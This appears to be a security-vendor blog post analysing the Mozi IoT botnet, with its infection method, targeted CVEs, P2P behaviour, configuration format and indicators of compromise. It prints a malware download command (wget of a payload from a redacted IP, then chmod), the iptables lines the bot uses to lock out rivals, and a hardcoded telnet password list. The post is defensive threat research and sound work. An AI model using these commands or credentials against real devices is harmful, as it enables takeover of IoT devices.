A New Botnet Attack Just Mozied Into Town


A relatively new player in the threat arena, the Mozi botnet, has spiked among Internet of things (IoT) devices, IBM X-Force has discovered.

This malware has been active since late 2019 and has code overlap with Mirai and its variants. Mozi accounted for nearly 90% of the observed IoT network traffic from October 2019 through June 2020.

This startling takeover was accompanied by a huge increase in overall IoT botnet activity, suggesting Mozi did not remove competitors from the market. Rather, it flooded the market, dwarfing other variants’ activity. Overall, combined IoT attack instances from October 2019, when attacks began to notably increase, through June 2020 is 400% higher than the combined IoT attack instances for the previous two years.

This surge in IoT attacks could be due to a number of causes, but may in part result from an ever-expanding IoT landscape for threat actors to target. There are about 31 billion IoT devices deployed around the globe, and the IoT deployment rate is now 127 devices per second.

Attackers have been leveraging these devices for some time now, most notably via the Mirai botnet. IBM X-Force Incident Response and Intelligence Services (IRIS) team has been following it for nearly four years. So why the sudden jump? IBM research suggests Mozi continues to be successful largely through the use of command injection (CMDi) attacks, which often result from the misconfiguration of IoT devices. The continued growth of IoT usage and poor configuration protocols are the likely culprits behind this jump. This increase may have been fueled further by corporate networks being accessed remotely more often due to COVID-19.

IoT Devices Are Everywhere

An IoT botnet can be used to perform distributed denial-of-service (DDoS) attacks, steal data and send spam. There are a plethora of different types of IoT devices to exploit:

  • Consumer IoT: Home-based devices, such as security cameras, lighting control, appliances, etc.
  • Commercial IoT: Devices designed for use in various industries. For instance, healthcare has internet-connected pacemakers and monitors. The transportation and construction industries use devices associated with vehicle trackers, telematics, logistic and supply chain systems and building information modeling.
  • Enterprise IoT: Devices designed for use in offices, such as projectors, routers, security systems and digital advertising.
  • The Industrial IoT: Industrial control systems, production line automation systems, logic controllers and aircraft systems.
  • Infrastructure IoT: Smart city management systems, traffic control devices, utility monitoring devices, etc.
  • Internet of Military Things: Wearable combat biometrics devices, robots and surveillance equipment.

This large attack surface leaves organizations vulnerable to IoT botnets. Couple that with the security holes these devices often have out of the box and lax hardening practices upon deployment. The most notable vulnerability in the IoT comes via CMDi attacks.

CMDi Attacks Deliver Mozi Botnet

Nearly all IBM-observed IoT targeting attempted to use CMDi attacks to gain initial access to the device. If the targeted endpoint was an IoT device and is susceptible to these attacks, the payload was downloaded and executed.

CMDi attacks are extremely popular against IoT devices for several reasons. First, IoT embedded systems commonly contain a web interface and a debugging interface left over from firmware development that can be exploited. Second, PHP modules built into IoT web interfaces can be exploited to give malicious actors remote execution capability. And third, IoT interfaces often are left vulnerable when deployed because administrators fail to harden the interfaces by sanitizing expected remote input. This allows threat actors to input shell commands such as “wget”.

Our analysis revealed the Mozi botnet leverages CMDi by using a “wget” shell command, then altering permissions to allow the threat actor to interact with the affected system. For example:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

If the host was vulnerable to CMDi, this command would download and execute a file called “mozi.a.” Our analysis of this particular sample indicates the file executes on microprocessor without interlocked pipelined stages (MIPS) architecture. This is an extension understood by machines running reduced instruction set computer (RISC) architecture, which is prevalent on many IoT devices. Once the attacker gains full access to the device through the botnet, the firmware level can be changed and additional malware can be planted on the device.

Although this example cites a well-known vector, it can continue to be effective for two main reasons. First, new vulnerabilities allow for constant updating of exploitation attempts via CMDi, and slow patch implementation can be exploited. Secondly, this activity is easily automated, allowing threat actors to hit a broad swath of devices quickly at low cost.

The Mozi botnet infrastructure appears primarily sourced in China, accounting for 84% of observed infrastructure. This fact aligns with other open-source research into IoT activity in 2020.

Below is a list of vulnerabilities IBM has observed the Mozi botnet attempting to exploit:

Vulnerability Affected Device
CVE-2017-17215 Huawei HG532
CVE-2018-10561 / CVE-2018-10562 GPON Routers
CVE-2014-8361 Devices using the Realtek SDK
Eir D1000 Wireless Router RCI Eir D1000 Wireless Router
CVE-2008-4873 Sepal SPBOARD
CVE-2016-6277 Netgear R7000 / R6400
Netgear setup.cgi unauthenticated RCE Netgear DGN1000
MVPower DVR Command Execution MVPower DVR TV-7104HE
CVE-2015-2051 D-Link Devices
D-Link UPnP SOAP Command Execution D-Link Devices
CCTV-DVR Vendors RCE Multiple CCTV-DVR Vendors

Mozi Botnet Technical Analysis

The Mozi botnet is a peer-to-peer (P2P) botnet based on the distributed sloppy hash table (DSHT) protocol, which can spread via IoT device exploits and weak telnet passwords.

Upon execution, the Mozi botnet attempts to bind local UDP port 14737. The sample reads /proc/net/tcp or /proc/net/raw to find and kill processes that use ports 1536 and 5888. The sample checks whether the file /usr/bin/python exists. If it exists, the sample changes its process name to sshd. Otherwise, the sample changes it to dropbear.

The Mozi botnet is known to have at least two unique characteristics. It uses ECDSA384 (elliptic curve digital signature algorithm 384) to verify its integrity. Additionally, it reuses parts of the Gafgyt code.

It contains hardcoded DHT public nodes, which can be used to join the P2P network. These nodes are:

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

The Mozi botnet contains four major capabilities. It can conduct DDoS attack (HTTP, TCP, UDP); carry out command execution attack; download malicious payload from specified URL and execute it; and gather bot information.

File Listing

The table below contains high-level details about the files analyzed. The details include both submitted files and residual files. (Residual files are files that are extracted statically or dynamically during malware analysis.) Data includes the file name, the file category as determined by analysis, file hash and file parentage in relation to the other files in the table.

File Name File Category File Hash Parent
mozi.m Botnet 4dde761681684d7edad4e5e1ffdb940b N/A
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Botnet 86d42d968d3d12c36722e16c78e49ffb mozi.m
mozi.a Botnet 9a111588a7db15b796421bd13a949cd4 N/A
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Botnet dd4b6f3216709e193ed9f06c37bcc3890 mozi.a

Behavioral Analysis of the Mozi Botnet

Upon execution, the sample attempts to bind local UDP port 14737. The sample reads /proc/net/tcp or /proc/net/raw to find and kill processes that use ports 1536 and 5888. The sample checks if the file /usr/bin/python exists. If it exists, the sample changes its process name to sshd. Otherwise, the sample changes it to dropbear:

The sample also attempts to update the access control list to block SSH and telnet to prevent other botnets from using them.

iptables -I INPUT  -p tcp –destination-port 22 -j DROP
iptables -I INPUT  -p tcp –destination-port 23 -j DROP
iptables -I INPUT  -p tcp –destination-port 2323 -j DROP
iptables -I OUTPUT -p tcp –source-port 22 -j DROP
iptables -I OUTPUT -p tcp –source-port 23 -j DROP
iptables -I OUTPUT -p tcp –source-port 2323 -j DROP

It also randomly selects hardcoded ports in the iptable:

DHT

The Mozi botnet uses a customized DHT protocol to develop its P2P network. The process of how a new Mozi node joins the DHT network is as follows:

  • A new Mozi node will send an initial HTTP request to http[:]//ia[.]51[.]la to register itself.
  • A new Mozi node sends a DHT find_node query to eight hardcoded DHT public nodes and connects these nodes to join the network. Find node is used to find the contact information for a node given its ID. These eight hardcoded DHT public nodes are as follows:
dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

The sample needs to generate an ID for the current node. According to a 360 Netlab report about Mozi, the “ID is 20 bytes and consists of the prefix 888888 embedded in the sample or the prefix specified by the config file [hp], plus a randomly generated string.” The config file is shown below:

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count] 

To join the DHT network, the sample sends a ping query to these hardcoded DHT public nodes. The ping query with node ID is shown in the traffic in the Wireshark figure below.

Static Analysis

Both samples are packed by using a customized UPX packer. It erases the value of p_file_size and p_blocksize to zero in p_info structure.

Configuration File

The sample contains a hardcoded configuration file shown below:

It contains four sections:

  • Blue: configuration data (428 bytes)
  • Green: ECDSA384 signature 1 (96 bytes)
  • Red: Configuration version (4 bytes)
  • Black: ECDSA384 signature 2 (96 bytes)

The configuration data is encoded using a hardcoded XOR key, 4E665A8F80C8AC238DAC4706D54F6F7E. The decoded configuration data is shown below:

[ss]bot[/ss][hp]88888888[/hp][count]http[:]//ia[.]51[.]la/go1?id=19894027&pu=http%3a%2f%2fbaidu.com/[idp][/count] 

The configuration data supports multiple commands that are tagged as follows:

Tag (Command) Description
[ss] Bot role
[ssx] enable/disable tag [ss]
[cpu] CPU architecture
[cpux] enable/disable tag [cpu]
[nd] new DHT node
[hp] DHT node hash prefix
[atk] DDoS attack type
[ver] Value in V section in DHT protcol
[sv] Update config
[ud] Update bot
[dr] Download and execute payload from the specified URL
[rn] Execute specified command
[dip] ip:port to download Mozi bot
[idp] report bot
[count] URL that used to report bot

The Mozi botnet reuses parts of the Gafgyt code in the DDoS attack. It supports multiple DDoS attack types such as HTTP, TCP, and UDP.

ECDSA384 signature 1 is used to verify the configuration data’s hash value. The hardcoded public key used to verify it is:

4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 
E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 
22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 
88

It is encoded with XOR key 4E665A8F80C8AC238DAC4706D54F6F7E. The decoded public key is:

02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 
a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 
6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 09 
c6

Config version determines when to update the bot. It will update the bot when this value is greater than its current value. ECDSA384 signature 2 is used to verify these first three parts of the config file. The hardcoded public key used to verify it is:

4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 
69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 
38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 2F 9E 94 
A1    

It is encoded with XOR key 4E665A8F80C8AC238DAC4706D54F6F7E. The decoded public key is:

02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 
27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 
76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea 
ef

Telnet Login Enumeration

In addition to the vulnerabilities the Mozi botnet exploits to obtain access to the victim device, the Mozi botnet can also brute force telnet credentials using a hardcoded list of credentials:

root
admin
CUAdmin
default
rapport
super
telnetadmin
!!Huawei
keomeo
support
CMCCAdmin
e8telnet
e8ehome1
e8ehome
user
mother
Administrator
service
supervisor
guest
admin1
administrator
666666
888888
ubnt
tech
xc3511
vizxv
Pon521
e2008jl
r@p8p0r+
GM8182
gpon
Zte521
hg2x0
epicrouter
conexant
xJ4pCYeW
v2mprt
PhrQjGzk
h@32LuyD
gw1admin
adminpass
xmhdipc
juantech
@HuaweiHgw
adminHW
2010vesta
2011vesta
plumeria0077
cat1029
123456
54321
hi3518
password
12345
fucker
pass
admin1234
1111
smcadmin
1234
klv123
klv1234
zte
jvbzd
anko
zlxx
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111
meinsm

One telnet login brute force used by the sample follows:

Indicators

Mozi.m and Mozi.a


Network

dht[.]transmissionbt[.]com:6881
router[.]bittorrent[.]com:6881
router[.]utorrent[.]com:6881
bttracker[.]debian[.]org:6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

Notable Strings (unpacked)

8.8.8.8
/proc/net/route
Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
GET
HEAD
POST
./config
/tmp/config
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi”
iptables -I INPUT  -p tcp –destination-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 50023 -j DROP
iptables -I OUTPUT -p tcp –source-port 35000 -j DROP
iptables -I INPUT  -p tcp –destination-port 7547 -j DROP
iptables -I OUTPUT -p tcp –source-port 7547 -j DROP
[cpux]
[/cpux]
[cpu]
[/cpu]
[ssx]
[/ssx]
[ss]
[/ss]
none
[sv]
[/sv]
[rn]
[/rn]
run:
[nd]
[/nd]
/tmp
/var
/temp
iptables -I INPUT  -p udp –destination-port %d -j ACCEPT
iptables -I OUTPUT -p udp –source-port %d -j ACCEPT
iptables -I PREROUTING  -t nat -p udp –destination-port %d -j ACCEPT
iptables -I POSTROUTING -t nat -p udp –source-port %d -j ACCEPT
0.0.0.0
[idp]
This node doesn’t accept announces
dht.transmissionbt.com:6881
router.bittorrent.com:6881
router.utorrent.com:6881
bttracker.debian.org:6881
212.129.33.59:6881
82.221.103.244:6881
130.239.18.159:6881
87.98.162.88:6881

Conclusion

The IoT botnet landscape continues to shift, and IBM Security’s data suggests threat actors remain active in this space. As newer botnet groups, such as Mozi, ramp up operations and overall IoT activity surges, organizations using IoT devices need to be cognizant of the evolving threat. IBM is increasingly seeing enterprise IoT devices under fire from attackers. Command injection remains the primary infection vector of choice for threat actors, reiterating how important it is to change default device settings and use effective penetration testing to find and fix gaps in the armor.

File Attributes

Mozi.m Metadata

File Name: Mozi.m
File Size: 108,808
MD5: 4dde761681684d7edad4e5e1ffdb940b
SHA1: 2327be693bc11a618c380d7d3abc2382d870d48b
SHA256: d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
File Type: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Category: Botnet
IRIS Name: Mozi
Other Names:

Mozi.a Metadata

File Name: Mozi.a
File Size: 95,268
MD5: 9a111588a7db15b796421bd13a949cd4
SHA1: 034c8c51a58be11ca620ce3eb0d43d5a59275d2f
SHA256: e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
File Type: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
Category: Botnet
IRIS Name: Mozi
Other Names:

5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a Metadata

File Name: d546_unpacked
File Size: 266,108
MD5: 86d42d968d3d12c36722e16c78e49ffb
SHA1: ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
SHA256: 5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
File Type: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Category: Botnet
IRIS Name: Mozi
Other Names:

83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Metadata

File Name: 83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
File Size: 212,464
MD5: dd4b6f3216709e193ed9f06c37bcc389
SHA1: 758ba1ab22dd37f0f9d6fd09419bfef44f810345
SHA256: 83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
File Type: b’ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped’
Category: Botnet
IRIS Name: Mozi
Other Names:

 

The post A New Botnet Attack Just Mozied Into Town appeared first on Security Intelligence.